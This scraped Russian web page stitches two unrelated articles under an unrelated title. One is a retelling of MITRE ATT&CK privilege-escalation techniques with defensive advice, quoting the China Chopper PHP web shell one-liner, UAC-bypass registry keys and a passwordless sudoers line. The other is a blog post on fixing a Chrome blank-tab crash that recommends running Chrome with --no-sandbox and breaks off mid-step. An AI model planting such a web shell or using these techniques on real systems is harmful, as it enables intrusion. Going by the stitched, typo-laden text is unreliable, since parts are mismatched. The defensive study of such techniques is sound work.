Appinit dlls что это
Перейти к содержимому

Appinit dlls что это

Повышение привилегий (Privilege Escalation)

Эскалация привилегий — это результат действий, которые позволяют злоумышленнику или вредоносной программе получить более высокий уровень разрешений в атакуемой системе или сети. Техники эскалации привилегий описывают методы, с помощью которых противник, получив непривилегированный доступ в атакуемую систему, используя различные «слабости» системы может получить права локального администратора, system или root. Использование злоумышленниками учетных записей пользователей с правами доступа к конкретным системам или разрешениями на выполнения определенных операций также может рассматриваться как эскалация привилегий.

Автор не несет ответственности за возможные последствия применения изложенной в статье информации, а также просит прощения за возможные неточности, допущенные в некоторых формулировках и терминах. Публикуемая информация является свободным пересказом содержания MITRE ATT&CK.

Важно отменить, что некоторые техники, описываемые в матрице ATT@CK, одновременно включены в несколько этапов цепочки атаки, например, перехват поиска DLL может использоваться как для закрепления доступа путём несанкционированного выполнения вредоносной DLL, так и для повышения привилегий путём запуска DLL в процессе, работающем в контексте более привилегированного пользователя.

Манипуляции с маркерами доступа (Access Token Manipulation)

  • Кража и олицетворение токенов. Олицетворение токенов — это способность ОС запускать потоки в контексте безопасности, отличном от контекста процесса, которому принадлежит этот поток. Другими словами, олицетворение токенов позволяет совершать какие-либо действия от имени другого пользователя. Противник может создать дубликат маркера доступа с помощью функции DuplicateTokenEX и использовать ImpersonateLoggedOnUser, чтобы вызвать поток в контексте залогиненного пользователя или использовать SetThreadToken, чтобы назначить маркер доступа в поток.
  • Создание процесса с помощью маркера доступа. Злоумышленник может создать маркер доступа с помощью функции DuplicateTokenEX и далее использовать его с CreateProcessWithTokenW для создания нового процесса, работающего в контексте олицетворяемого пользователя.
  • Получение и олицетворение маркеров доступа. Противник, имея логин и пароль пользователя, может создать сеанс входа в систему с помощью API-функции LogonUser, которая вернёт копию сессионного маркера доступа нового сеанса, и далее с помощью функции SetThreadToken назначить маркер для потока. Metasploit Meterpreter и CobaltStrike имеют инструментарий для манипуляций с маркерами доступа с целью повышения привилегий.

Модификация исполняемых файлов приложений «специальные возможности Windows» (Accessibility Features)

  • C:\Windows\System32\sethc.exe — запускается 5-кратным нажатием клавиши Shift;
  • C:\Windows\System32\utilman.exe — запускается нажатием комбинации Win+U.
  • C:\Windows\System32\osk.exe;
  • C:\Windows\System32\Magnify.exe;
  • C:\Windows\System32\Narrator.exe;
  • C:\Windows\System32\DisplaySwitch.exe;
  • C:\Windows\System32\AtBroker.exe.

Модификация ключа AppCert DLLs

Система: Windows
Права: Администратор, System
Описание: Библиотеки DLL, указанные в значении ключа AppCertDLLs загружаются в каждый процесс, который вызывает часто используемые функции API: CreateProcess, CreateProcessAsUser, CreateProcessWithLoginW, CreateProcessWithTokenW, WinExec. Значением ключа AppCertDLLs можно злоупотреблять, вызвав загрузку вредоносной DLL и запустив определенные процессы. AppCertDLLs хранится в следующем разделе реестра:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager.

Рекомендации по защите: Применяйте всевозможные средства блокировки потенциально-опасного программного обеспечения и загрузки неизвестных DLL-библиотек, например AppLocker и DeviceGuard.

Модификация ключа AppInit DLLs

  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows;
  • HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows.

Рекомендации по защите: Рассмотрите возможность использования ОС версии не ранее Windows 8 и включения безопасной загрузки. Применяйте всевозможные средства блокировки потенциально-опасного программного обеспечения и загрузки неизвестных DLL-библиотек, например AppLocker и DeviceGuard.

Злоупотребление подсистемой совместимости приложений (Application Shimming)

  • %WINDIR%\AppPatch\sysmain.sdb;
  • HKLM\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB.
  • %WINDIR%\AppPatch[64]\Custom;
  • HKLM\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom.

Рекомендации по защите: Способов предотвращения Application shiming не так много. Отключение совместимости приложений не рекомендуется во избежание проблем со стабильностью работы ОС. Microsoft выпустила KB3045645, которое удалит флаг «auto-elevate» в файле sdbinst.exe для предотвращения использования shim-системы для обхода UAC.

Обход контроля учетных записей (Bypass User Account Control)

Система: Windows
Права: Пользователь, администратор
Описание: Известно множество способов обхода UAC, самые распространенные из которых реализованы в проекте UACMe. Регулярно обнаруживаются новые способы обхода UAC, подобные злоупотреблению системным приложением eventvwr.exe, которое может выполнить бинарный файл или скрипт с повышенными правами. Вредоносные программы также могут быть внедрены в доверенные процессы, которым UAC разрешает повышение привилегий не запрашивая пользователя.
Для обхода UAC с помощью eventvwr.exe в реестре Windows модифицируется ключ:
[HKEY_CURRENT_USER]\Software\Classes\mscfile\shell \open\command.
Для обхода UAC с помощью sdclt.exe в реестре Windows модифицируются ключи:
[HKEY_CURRENT_USER]\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe;
[HKEY_CURRENT_USER]\Software\Classes\exefile\shell\runas\command\isolatedCommand.

Рекомендации по защите: Удаляйте пользователей из локальной группы администраторов в защищаемых системах. По возможности включите в параметрах UAC наивысший уровень защиты.

Перехват поиска DLL (DLL Search Order Hijacking)

Система: Windows
Права: Пользователь, Администратор, System
Описание: Техника заключается в эксплуатации уязвимостей алгоритма поиска приложениями файлов DLL, необходимых им для работы (MSA2269637). Зачастую директорией поиска DLL является рабочий каталог программы, поэтому злоумышленники могут подменять исходную DLL на вредоносную с тем же именем файла.
Удаленные атаки на поиск DLL могут проводиться когда программа устанавливает свой текущий каталог в удаленной директории, например, сетевую шару. Также злоумышленники могут напрямую менять способ поиска и загрузки DLL заменяя файлы .manifest или .local, в которых описываются параметры поиска DLL. Если атакуемая программа работает с высоким уровнем привилегий, то подгруженная ею вредоносная DLL также будет выполняться с высокими правами. В этом случае техника может использоваться для повышения привилегий от пользователя до администратора или System.

Рекомендации по защите: Запрет удаленной загрузки DLL (включено по умолчанию в Windows Server 2012+ и доступно с обновлениями для XP+ и Server 2003+). Включение безопасного режима поиска DLL, который ограничит каталоги поиска директориями типа %SYSTEMROOT% до выполнения поиска DLL в текущей директории приложения.
Включение режима безопасного поиска DLL:
Computer Configuration > [Policies] > Administrative Templates > MSS (Legacy): MSS: (SafeDllSearchMode) Enable Safe DLL search mode.
Соответствующий ключ реестра:
HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\SafeDLLSearchMode.

Рассмотрите целесообразность аудита защищаемой системы для устранения недостатков DLL с помощью таких инструментов как модуль PowerUP в PowerSploit. Не забывайте про блокировку вредоносного и потенциально-опасного ПО, а так же выполнение рекомендаций Microsoft.

Перехват поиска Dylib (Dylib Hijacking)

Система: macOS
Права: Пользователь
Описание: Техника основана на уязвимостях алгоритмов поиска динамических библиотек dylib в macOS и OS X. Суть заключается в определении dylib, которые подгружает атакуемое приложение и последующем размещении вредоносной версии dylib с тем же именем в рабочей директории приложения. Это приведёт к загрузке приложением dylib, которая размещена в рабочем каталоге программы. При этом вредоносная Dylib будет выполнятся с правами доступа атакуемого приложения.

Рекомендации по защите: Запрет записи пользователями файлов в каталоги поиска dylib. Аудит уязвимостей с помощью Dylib Hijacking Scanner от Objective-See.

Эксплуатация уязвимостей для повышения привилегий (Exploitation for Privilege Escalation)

Система: Windows, Linux, macOS
Права: Пользователь
Описание: Противники могут повысить привилегии в атакуемой системе используя уязвимости в программном обеспечении.

Рекомендации по защите: Регулярное обновление ПО на всех защищаемых рабочих станциях, серверах, сетевом оборудовании и других устройствах подключенных к защищаемой сети. Проводите анализ типов угроз, уязвимостей, программ-эксплойтов, которые можно использовать против защищаемой организации. Так же рекомендуется применение систем защиты от эксплойтов, например, Windows Defender Exploit Guard (WDEG) для Windows 10 или Enhanced Mitigation Experience Toolkit (EMET) для более ранних версий Windows.

h3EWM-инъекции (Extra Window Memory Injection)
Система: Windows
Права: Администратор, System
Описание: Техника заключается в злоупотреблении дополнительной памятью окна Windows, так называемой Extra Window Memory (EWM). Размер EWM — 40 байт, подходит для хранения 32-битного указателя и часто используется для указания ссылки на процедуры. Вредоносные программы в ходе цепочки атаки, могут размещать в EWM указатель на вредоносный код, который в последствие будет запущен процессом инфицированного приложения.

Рекомендации по защите: Учитывая, что техники EWM-инъекций основаны на злоупотреблении функциями разработки ОС усилия по защите необходимо направить на предотвращение запуска вредоносных программ и инструментов злоумышленников. Хорошей практикой является выявление и блокирование потенциально-опасного ПО с помощью AppLocker, организации белого списка приложений или применения политик ограничения программного обеспечения Software Restriction Policies.

Недостатки разрешений на уровне файловой системы (File System Permissions Weakness)

Система: Windows
Права: Пользователь, Администратор
Описание: Суть техники заключается в подмене исполняемых файлов, которые автоматически запускаются различными процессами (например, при загрузке ОС или в определенное время, в случае если права на исполняемые файлы настроены неверно). После подмены вредоносный файл будет запущен с правами процесса, таким образом если процесс имеет более высокий уровень доступа злоумышленник сможет осуществить эскалацию привилегий. В рамках данной техники злоумышленники могут пытаться манипулировать двоичными файлами служб Windows.
Другой вариант атаки связан с недостатками алгоритмов в работе самораспаковывающихся установщиков. В процессе инсталляции ПО, установщики зачастую распаковывают различные полезные файлы, в том числе .dll и .exe, в каталог %TEMP%, при этом они могут не устанавливать соответствующие разрешения для ограничения доступа к распаковываемым файлам, что позволяет злоумышленникам совершать подмену файлов и, как следствие, повысить привилегии или обойти контроль учетных записей, т.к. некоторые установщики выполняются с расширенными правами.

  • [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System].
  • «ConsentPromptBehaviorUser»=dword:00000000.
  • «EnableInstallerDetection»=dword:00000001, который будет требовать ввода пароля для установки программ.

Перехват вызовов функций Windows API (Hooking)

  • Hook-процедур — встроенных в ОС процедур, которые выполняют код при вызове различных событий, например, нажатие клавиш или перемещение мыши;
  • Модификации адресной таблицы (IAT), в которой хранятся указатели на API-функции. Это позволит «обмануть» атакуемое приложение, заставив его запустить вредоносную функцию;
  • Непосредственного изменения функции (сплайсинг), в ходе которого меняются первые 5 байт функции, вместо которых вставляется переход на вредоносную или иную функцию, определенную злоумышленником.

Рекомендации по защите: Перехват событий в ОС является частью нормальной работы системы, поэтому какое либо ограничение данной функциональности может негативно влиять на стабильность работы законных приложений, например антивирусного ПО. Усилия по предотвращению применения техник перехвата необходимо сосредоточить на более ранних этапах цепочки атаки. Обнаружить вредоносную hooking-активность можно с помощью мониторинга вызовов функций SetWindowsHookEx и SetWinEventHook, использования детекторов руткитов, анализа аномального поведения процессов.

IFEO-инъекции (Image File Execution Options Injection)

  • HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options/[executable]
  • HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\[executable], где [executable] — это исполняемый двоичный файл отладчика.

Рекомендации по защите: Описываемая техника основана на злоупотреблении штатными средствами разработки ОС, поэтому какие-либо ограничения могут вызвать нестабильность работы законного ПО, например, приложений безопасности. Усилия по предотвращению применения техники IFEO-инъекций необходимо сосредоточить на более ранних этапах цепочки атаки. Обнаружить подобную атаку можно с помощью мониторинга процессов с флагами Debug_process и Debug_only_this_process.

Запуск демонов (Launch Daemon)>

  • /System/Library/LaunchDeamons;
  • /Library/LaunchDeamons.

Рекомендации по защите: Ограничьте привилегии пользователей, чтобы только авторизованные администраторы могли создавать Launch Daemon. Рассмотрите возможность мониторинга создания в системе plist-файлов с помощью таких приложений как KnockKnock.

Новые службы (New Service)

Система: Windows
Права: Администратор, System
Описание: Имя доступ в систему, злоумышленники могут создавать новые службы и настраивать их автоматический запуск. Имя службы может быть замаскировано с использованием имён, характерных для операционной системы. Службы могут быть созданы с привилегиями администратора, но запускаться от имени System. Сервисы могут создаваться из командной строки, с помощью средств удаленного доступа с функциями взаимодействия с Windows API или с помощью стандартных средств управления Windows и PowerShell.

Рекомендации по защите: Ограничьте права пользователей на создание новых служб, чтобы только уполномоченные администраторы могли это делать. Применяйте AppLocker и Software Restriction Policy.

Перехват пути (Path Interception)

  • Несуществующие пути. Пути к исполняемым файлам служб хранятся в ключах реестра и могут иметь один или несколько пробелов, например, C:\Program Files\service.exe, если атакующий создаст в системе файл C:\Program.exe, то Windows при обработке пути запустит его вместо целевого файла службы.
  • Неправильная конфигурация переменных окружения. Если в переменной PATH путь C:\example предшествует c:\Windows\System32 и существует файл C:\example\net.exe, то при вызове команды net, будет выполнен C:\example\net.exe, а не c:\Windows\System32\net.exe.
  • Перехват порядка поиска (Search order hijacking). Когда не задан полный путь к исполняемому файлу, Windows, как правило, ищет файл с указанным именем в текущем каталоге, затем осуществляет поиск в системных каталогах. Например, файл «example.exe» при выполнении запускает cmd.exe с аргументами для выполнения команды net use. Атакующий может поместить в каталог расположения example.exe файл net.exe и он будет запущен вместо утилиты c:\Windows\System32\net.exe. Кроме того, если атакующий поместит файл net.com в каталог с файлом net.exe, то Windows выполнит net.com в соответствии с порядком исполнения, определенном в системной переменной PATHEXT.

Рекомендации по защите: Выделите кавычками пути, указанные в файлах конфигураций, сценариях, переменной PATH, настройках служб и ярлыках. Помните о порядке поиска исполняемых файлов и используйте только полные пути. Выполните очистку старых ключей реестра, оставшихся от удаленного ПО, чтобы в реестре не осталось ключей, указывающих на несуществующие файлы. Установите запрет на запись пользователями системы в корневой каталог С:\ и системные каталоги Windows, ограничивайте права на запись в каталоги с исполняемыми файлами.

Модификация файлов Plist (Plist Modification)

/Library/Preferences выполняются с привилегиями пользователя.

Рекомендации по защите: Предотвратите изменение файлов plist, сделав их доступными только на чтение.

Модификация Port Monitors в Диспетчере печати (Port Monitors)

Система: Windows
Права: Администратор, System
Описание: Атакующий может организовать выполнение произвольной DLL от имени System при каждой загрузке Windows с помощью злоупотребления настройками Диспетчера печати (Spoolsv.exe). Для взаимодействия с устройствами печати Spoolsv.exe использует так называемые мониторы порта (port monitor) — это DLL-библиотеки, с помощью которых посредством LAN, USB, LPT или COM-интерфейса на устройства печати передаются низкоуровневые команды. Вышеописанные DLL хранятся в C:\windows\system32 и регистрируются в реестре:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Monitors.
Port Monitor можно установить с помощью API функции AddMonitor или напрямую через редактирование вышеуказанного раздела реестра.

Рекомендации по защите: Организуйте блокирование потенциально-опасного ПО и применяйте инструменты контроля запуска приложений.

Инъекция кода в процесс (Process Injection), Ten Process Injection Techniques

Система: Windows, Linux, macOS
Права: Пользователь, администратор, system, root
Описание: Процессные инъекции — это метод выполнения произвольного кода в адресном пространстве отдельно живущего процесса. Запуск кода в контексте другого процесса позволяет получить доступ к памяти инъецируемого процесса, системным/сетевым ресурсам и, возможно, повышенные привилегии. Процессные инъекции также могут использоваться во избежание возможного обнаружения вредоносной активности средствами безопасности. Техники реализации инъекций в процессы основны на злоупотреблении различными механизмами, обеспечивающими многопоточность выполнения программ в ОС. Далее рассмотрены некоторые подходы к выполнению инъекции кода в процесс.

Windows
• DLL-инъекции. Выполняются посредством записи пути к вредоносной DLL внутрь процесса с её последующим выполнением путём создания удаленного потока (Remote thread — поток, который работает в виртуальном адресном пространстве другого процесса). Иными словами, вредоносное ПО записывает на диск DLL, а затем использует функцию подобную CreateRemoteTread, с помощью которой будет вызвана функция LoadLibrary в инъецируемом процессе.
• PE-инъекции (Portable executable injection) основаны на злоупотреблении особенностями выполнения в памяти PE-файлов, таких как DLL или EXE. Вредоносный код записывается в процесс без записи каких-либо файлов на диске, а затем с помощью дополнительного кода или путем создания удаленного потока вызывается его исполнение.
• Захват выполнения потока (Thread execution hijacking) включает в себя инъекции вредоносного кода или пути к DLL напрямую в поток процесса. Подобно технике Process Hollowing, поток сначала должен быть приостановлен.
• Инъекции в процедуры асинхронного вызова (Asynchronous Procedure Call (APC) injection) предполагают вложение вредоносного кода в очередь APC-процедур (APC Queue) потока процесса. Один из способов APC-инъекций, получивший название «Инъекция ранней пташки (Earle Bird injection)», предполагает создание приостановленного процесса в котором вредоносный код может быть записан и запущен до точки входа процесса через APC. AtomBombing — это другой вариант инъекции, который использует APC для вызова вредоносного кода, ранее записанного в глобальную таблицу атомов (Global atom table).
• Инъекции в локальное хранилище потока (Thread Local Storage (TLS) injection) предполагают манипуляции с указателями памяти внутри исполняемого PE-файла для перенаправления процесса на вредоносный код.

Mac и Linux
• Системные переменные LD_RPELOAD, LD_LIBRARY_PATH (Linux), DYLIB_INSERT_LIBRARIES (macOS X) или интерфейс прикладного программирования dlfcn (API) могут использоваться для динамической загрузки библиотеки (общего объекта) в процесс, который в свою очередь может использоваться для перехвата вызовов API из запущенных процессов.
• Системный вызов Ptrace может использоваться для подключения к запущенному процессу и изменения во время его выполнения.
• /proc/[pid]/mem обеспечивает доступ к памяти процесса и может использоваться для чтения/записи произвольных данных, однако такой метод редко применяется из-за сложности его реализации.
• Захват VDSO (Virtual dynamic shared object) позволяет осуществить инъекцию кода во время исполнения двоичных файлов ELF, манипулируя заглушками кода из linux-vdso.so.
Вредоносные программы обычно используют инъекции кода в процесс для доступа к системным ресурсам, благодаря которым злоумышленник может закрепиться в системе и выполнять другие изменения в атакуемой среде. Более сложные образцы могут выполнять множественные инъекции процессов для затруднения своего обнаружения.

Рекомендации по защите: Методы инъецирования кода в процессы основаны на злоупотреблении штатными функциями ОС прямое воздействие на которые может привести к нестабильной работе законного ПО и продуктов безопасности. Усилия по предотвращению применения техник перехвата необходимо сосредоточить на более ранних этапах цепочки атаки. Применяйте инструменты блокировки потенциально-опасного ПО, такие как AppLocker. Применяйте Yama в качестве превентивной меры от инъекций кода в ptrace, ограничив использование ptrace только привилегированными пользователями. Дополнительные меры защиты могут включать развертывание модулей безопасности ядра, обеспечивающих расширенный контроль доступа и ограничение процессов. К таким средствам относятся SELinux, grsecurity, AppArmor.

Инъекции в SID-истории (SID-History Injection)

Система: Windows
Права: Администратор, система
Описание: Всякий раз, когда объект перемещается из одного домена в другой создается новый SID, который становится основным objectSID. Предыдущие SID продолжают храниться в свойстве sIDHistory, таким образом обеспечивая сохранение прав, которые имел объект до междоменной миграции. Злоумышленники, при наличии прав администратора, могут вставлять в SID-History собранные ранее SID, чтобы выполнить действие от имени более привилегированных групп доступа или учетных записей, такие как администраторы домена.

Рекомендации по защите: В ОС Windows Server версии 2003 и выше по умолчанию включена Фильтрация SID (SID Filtering), которая предполагает удаление или фильтрацию всех SID, кроме доверенного домена, однако данная опция может быть умышленно отключена, чтобы разрешить междоменный доступ.
Основные способы фильтрации SID:
• Отключение SIDHistory в параметрах доверительных отношений (трастов) между лесами доменов с помощью команды: netdom trust /domain: /EnableSIDHistory:no;
• Применение SID Filter Quarantining. Это гарантирует, что объект, содержащий SID, отличный от доверенного домена, не сможет пройти аутентификацию в доверяющем домене. SID Filter Quarantining применяется для внешних трастов с помощью выполнения команды: netdom trust /domain: /quarantine:yes.
Применение SID Filtering между доменами одного леса не рекомендуется. Если домен в лесу ненадёжен, то он не должен быть членом леса, в такой ситуации необходимо сначала разделить доверенные и ненадежные домены на отдельные леса, а затем применить SID Filtering для трастов между лесами.

Планирование задач (Scheduled Task)

Система: Windows
Права: Пользователь, администратор, система
Описание: Такие утилиты как at, schtasks и Планировщик задач Windows могут использоваться для планирования запуска программ и сценариев, которые будут выполнятся в определенную дату и время. Задачу можно запланировать в удаленной системе, при условии, что для проверки подлинности используется RPC, и включен общий доступ к принтерам и файлам. Планирование задач в удаленной системе требует прав администратора. Злоумышленник может использовать удаленное выполнение кода для получения прав System или для запуска процесса под определенной учетной записью.

Рекомендации по защите: Ограничение привилегий пользователей. Применение инструментов, таких как модуль PowerUP в PowerSploit, которые могут использоваться для поиска слабых мест в разрешениях запланированных задач. Отключение возможности запуска задач от имени System, отключение в политике безопасности параметра «Разрешить операторам сервера планировать задачи» и включение параметра «Назначение прав пользователя: Увеличить приоритет планирования«.

Слабости разрешений параметров служб в реестре (Service Registry Permissions Weakness)

Система: Windows
Права: Администратор, System
Описание: Если разрешения пользователей и групп позволяют изменять в реестре Windows значения ключей, в которых хранятся параметры служб, то злоумышленники могут напрямую модифицировать ключи, в которых хранятся пути к исполняемым файлам запуска служб или использовать различные инструменты управления службами — sc.exe, PowerShell или Reg. Атакующие так же могут менять параметры, связанные с отказом служб, например, FailureCommand, указывающие команду, которая будет выполнятся в случае отказа или преднамеренного повреждения службы. Параметры служб хранятся в HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services.

Рекомендации по защите: Убедитесь, что пользователи защищаемой системы не могут изменять в реестре ключи, хранящие параметры системных компонентов. Используйте всевозможные средства блокирования потенциально-опасного ПО, например, Windows AppLocker.

Setuid и Setgid

Система: Linux, macOS
Права: Пользователь
Описание: Setuid и Setgid — это флаги прав доступа в Unix-системах, которые разрешают пользователю запускать исполняемые файлы с правами владельца или группы исполняемого файла. Если приложение необходимо запустить от имени root, то вместо того, чтобы создавать запись в файле sudo, пользователь может указать флаг Setuid или Setgid. Противники могут злоупотреблять флагами Setuid и Setgid чтобы выполнить shell escape (приём, когда в консольном режиме какое-либо приложение использует файл открытый в другом приложении) либо воспользоваться уязвимостью приложения с флагами Setuid и Setgid и выполнить код в контексте различных пользователей. При просмотре атрибутов файла командой ls -l вышеописанные флаги обозначаются символом «s» вместо «x». Утилита chmod может устанавливать флаги Setuid и Setgid с помощью команды chmod 4777 [файл] или chmod u + s [файл].

Рекомендации по защите: Сведите количество программ с установленными флагами Setuid и Setgid к минимуму.

Элементы автозапуска (Startup Items)

Система: macOS
Права: Администратор
Описание: Атакующий может использовать устаревший, но до сих пор работающий в macOS Sierra, механизм автозапуска приложений с помощью StartupItems для настройки запуска своего кода с правами root во время загрузки ОС. StartupItems — это каталог в /Library/Startupitems, командный сценарий и файл свойств StartupParameters.plist. Сценарий и файл свойств должны находится на верхнем уровне иерархии: /Library/Startupitems/[MyStartupItem].

Рекомендации по защите: Поскольку механизм StartupItems является устаревшим, то запрет записи в каталоге /Library/Startupitems/ позволит избежать создания элементов автозагрузки.

Система: Linux, macOS
Права: Пользователь
Описание: Противники могут пользоваться недостатками конфигурации Sudo для выполнения команд от имени других пользователей или порождения процессов с более высокими привилегиями. Параметры Sudo хранятся в файле /etc/sudoers, для редактирования этого файла необходимы повышенные привилегии. Файл sudoers описывает какие команды пользователи могут запускать от имени других пользователей или групп, это позволяет пользователям работать большую часть времени с минимальными правами и только при необходимости повышать привилегии. Однако, в файле sudoers можно указать пользователей, для которых пароль запрашиваться не будет: username ALL=(ALL) NOPASSWD: ALL.

Рекомендации по защите: Файл sudoers должен быть отредактирован так, чтобы пользователи всегда вводили пароль при выполнении Sudo. Auditd в Linux может генерировать предупреждение всякий раз, когда реальный и эффективный ID пользователя не совпадают (это происходит, когда пользователь использует sudo).

Sudo Caching

Система: Linux, macOS
Права: User
Описание: Различные вредоносные программы, как, например, OCX Proton Malware, могут злоупотреблять настройками sudo, чтобы выполнить код от имени root без ввода пароля. Поскольку инструментарий sudo был создан для системного администрирования в нём есть некоторые полезные функции такие как timestamp_timeout — этот параметр хранит количество времени в минутах между запусками sudo в течение которого команда не будет запрашивать ввод пароля root. Sudo имеет возможность кэширования учетных данных в течение некоторого времени. Отметка о времени последнего запуска Sudo хранится в /var/db/sudo и служит для определения заданного таймаута. Кроме того, существует переменная tty_tickets, которая обрабатывает каждый новый сеанс терминала изолированно, таким образом таймаут в одном экземпляре консоли не повлияет на таймаут в другом экземпляре.

Рекомендации по защите: Установите значение параметра timestamp_timeout = 0, чтобы система требовала ввод пароля root при каждом выполнении sudo. Включите параметр tty_tickets, чтобы предотвратить возможность реализации атаки через сеансы командной консоли.

Valid Accounts

Описание: Злоумышленники могут украсть учетные данные определенного пользователя или учетную запись службы с помощью техник доступа к учетным данным, захватить учетные данные в процессе разведки с помощью социальной инженерии. Скомпрометированные учетные данные могут использоваться для обхода систем управления доступом и получения доступа к удаленным системам и внешним службам, таким как VPN, OWA, удаленный рабочий стол или получения повышенных привилегий в определенных системах и областях сети. В случае успешной реализации сценария злоумышленники могут отказаться от вредоносных программ, чтобы затруднить своё обнаружение. Так же злоумышленники могут создавать учетные записи используя заранее определенные имена и пароли для сохранения резервного доступа в случае неудачных попыток использования других средств.

Рекомендации по защите: Применение парольной политики, следование рекомендациям по проектированию и администрированию корпоративной сети для ограничения использования привилегированных учетных записей на всех административных уровнях. Регулярные проверки доменных, локальных учетных записей и их прав с целью выявления тех, которые могут позволить злоумышленнику получить широкий доступ. Мониторинг активности учетных записей с помощью SIEM-систем.

Web Shell

Система: Windows, Linux, macOS
Описание: Web Shell может использоваться злоумышленником в качестве шлюза доступа в вашу сеть или избыточного доступа в атакуемую систему, как резервного механизма закрепления в случае обнаружения и блокирования основных каналов доступа в атакуемую среду.

Рекомендации по защите: Убедитесь, что ваши внешние веб-серверы регулярно обновляются и не имеют известных уязвимостей, которые позволяют злоумышленникам загрузить на сервер файл или сценарий с последующим исполнением. Проверьте, что разрешения учетных записей и групп с правами управления серверами не совпадают с учетными записями внутренней сети, которые могут быть использованы для входа на веб-сервер, запуска Web shell или закрепления на Web-сервере. Web Shell трудно обнаружить, т.к. они не инициируют подключения и их серверная часть может быть маленькой и безобидной, например, PHP-версия оболочки China Chopper Web выглядит как строчка:
[?php eval($_POST [‘password’]);]

Appinit dlls что это

Chrome White Screen of DeathДобрый день! Уважаемые читатели и гости одного из крупнейших IT блогов Pyatilistnik.org. В прошлый раз мы с вами научились блокировать Push-уведомления и автозапуск видео в Google Chrome. Сегодня мы опять вернемся к данному браузеру и разберем очень не приятную ситуацию, при которой Chrome не открывает страницы, показывает что произошел сбой. В результате пользователь лицезреет белый экран смерти, как его еще называют и улыбающуюся мордочку, которую забавляет ваша ситуация.

Белый экран смерти с хихикающей рожицей

Chrome как и другие программы или браузеры, например Edge Chromium иногда может глючить, не корректно открывать страницы, это нормально так как в этом замешан человеческий фактор и, что греха таить отдел тестирования у Google в 100 раз лучше и бдительнее, чем у того же Microsoft, который к каждым обновлением ломает какие-то функции, то у них черные экраны, то звук не работает, короче пользователи Windows 10 постоянно в тонусе.

Когда у вас происходит подобного рода сбои на локальном компьютере, то это неприятно, но не смертельно, а вот когда так происходит массово, как у меня на терминальном столе RDS фермы, то тут уже затрагивает большое количество сотрудников и бизнес начинает испытывать простой. Могу предположить, что у многих компаний Google Chrome выступает в роли корпоративного браузера по умолчанию и его управление осуществляется через групповые политики.

Поступила заявка, о том что на одной из терминальных нод отсутствует интернет в Chrome, я точно знал, что ограничений там не должно было быть. Когда я зашел на нужный мне сервер RDS фермы, то при открытии в Chrome новой вкладки я получил белый экран, а при наведении курсора на вкладку у меня отображалось, что вкладка без имени и что произошел сбой в google.com.

Chrome произошел сбой

История и причины белого экрана смерти в Гугл Хром

Впервые эта проблема появилась в среду, 13 ноября 2019. Она затронула не всех пользователей Chrome, а только браузеры Chrome, работающие на « терминальном сервере » Windows Server. Согласно сотням сообщений, пользователи утверждают, что вкладки Chrome внезапно стали пустыми из-за так называемой ошибки «белого экрана смерти» (White Screen of Death — WSOD), у кого-то как у меня пропал доступ в интернет.

Проблема оказалась не шуточной и многие системные администраторы многих компаний сообщили, что сотни и тысячи сотрудников не могут использовать Chrome для доступа к Интернету, поскольку активная вкладка браузера постоянно гаснет во время работы. В жестко контролируемых корпоративных средах многие сотрудники не имели возможности сменить браузер и не могли выполнять свою работу. Аналогичным образом, системные администраторы не могут сразу заменить Chrome другим браузером. Особенно, это актуально в государственном секторе.

В результате массовых возмущений представители компании быстро выяснили, что причиной всему стала функция WebContents Occlusion. WebContents Occlusion — это функция, которая приостанавливает работу вкладок Chrome, когда пользователи перемещают другие окна приложений поверх Chrome, рассматривая активную вкладку Chrome как фоновую вкладку, но самое интересное что и при открытии нового пустого браузера без вкладок, белый экран и сообщение о произошедшем сбое так же появлялись.

Функция, предназначенная для улучшения использования ресурсов Chrome, когда она не используется, тестировалась в выпусках Chrome Canary в течение всего 2019 года. Как только пользователи начали переходить на версии Chrome 77 и выше, то все стали ощущать данный просчет со стороны разработчиков.

Как устранить сбои с белым экраном смерти в Chrome

И так причины данной проблемы мы выяснили, давайте их устранять. Первое, что я вам посоветую, это отключить «Occlusion» опции. Для этого откройте ваш браузер и в адресной строке введите:

В результате чего у вас откроется окно с экспериментальными настройками браузера, тут в поисковой строке вам необходимо ввести слово «Occlusion«. После чего вы получите два параметра:

    • web-contents-occlusion — Рассчитывать окклюзию окна в Windows, будет использоваться в будущем для регулирования и потенциальной выгрузки вкладок переднего плана в закрытых окнах — Windows
    • calculate-native-win-occlusion — Если включено, то веб-содержимое будет вести себя как скрытое, когда оно закрывается другими окнами. — Mac, Windows, Chrome OS

    Далее на против каждого из пунктов вам нужно переключить состояние с «Default» на «Disable«

    Отключаем Occlusion в Chrome

    Обратите внимание, что как только вы поменяете статус запуска компонентов «Occlusion» вам необходимо перезапустить Chrome, иначе параметры не применяться в данном сеансе.

    Устранение сбоя вкладок в Chrome

    После всех манипуляций вы можете проверить, пропал ли у вас белый экран смерти и появилась ли возможность открывать сайты. В большинстве случаев, это помогает, но в у меня в я все так же продолжал получать, что у меня вкладка без имени и произошел сбой в google.com.

    Добавление ключей запуска Chrome

    Следующим, сработавшим для меня методом было добавление в ярлык запуска Гугл Хром определенного ключа. Щелкните по ярлыку Chrome и из контекстного меню выберите пункт «Свойства«.

    Добавление ключей запуска Chrome

    На вкладке «Ярлык» вам нужно найти строку «Объект» в ней указан путь до исполняемого файла, который запускает Google Chrome, в конце этой строки поставьте пробел и добавьте ключ —no-sandbox. В результате должно получиться:

    Добавление --no-sandbox в ярлык Chrime

    Сохраняем настройки и пробуем запустить ваш браузер, вкладки должны теперь точно показываться и все сайты открываться.

    Если Гугл Хром не открывает страницы, то у тебя может сидеть вирус

    Если у вас все равно Chrome не открывает страницы, то нужно по мимо проверки браузера и компьютера на вирусы, проверить одну ветку ветку реестра, в которой может укрываться ваша проблема. Запустите окно «Выполнить» и введите regedit.

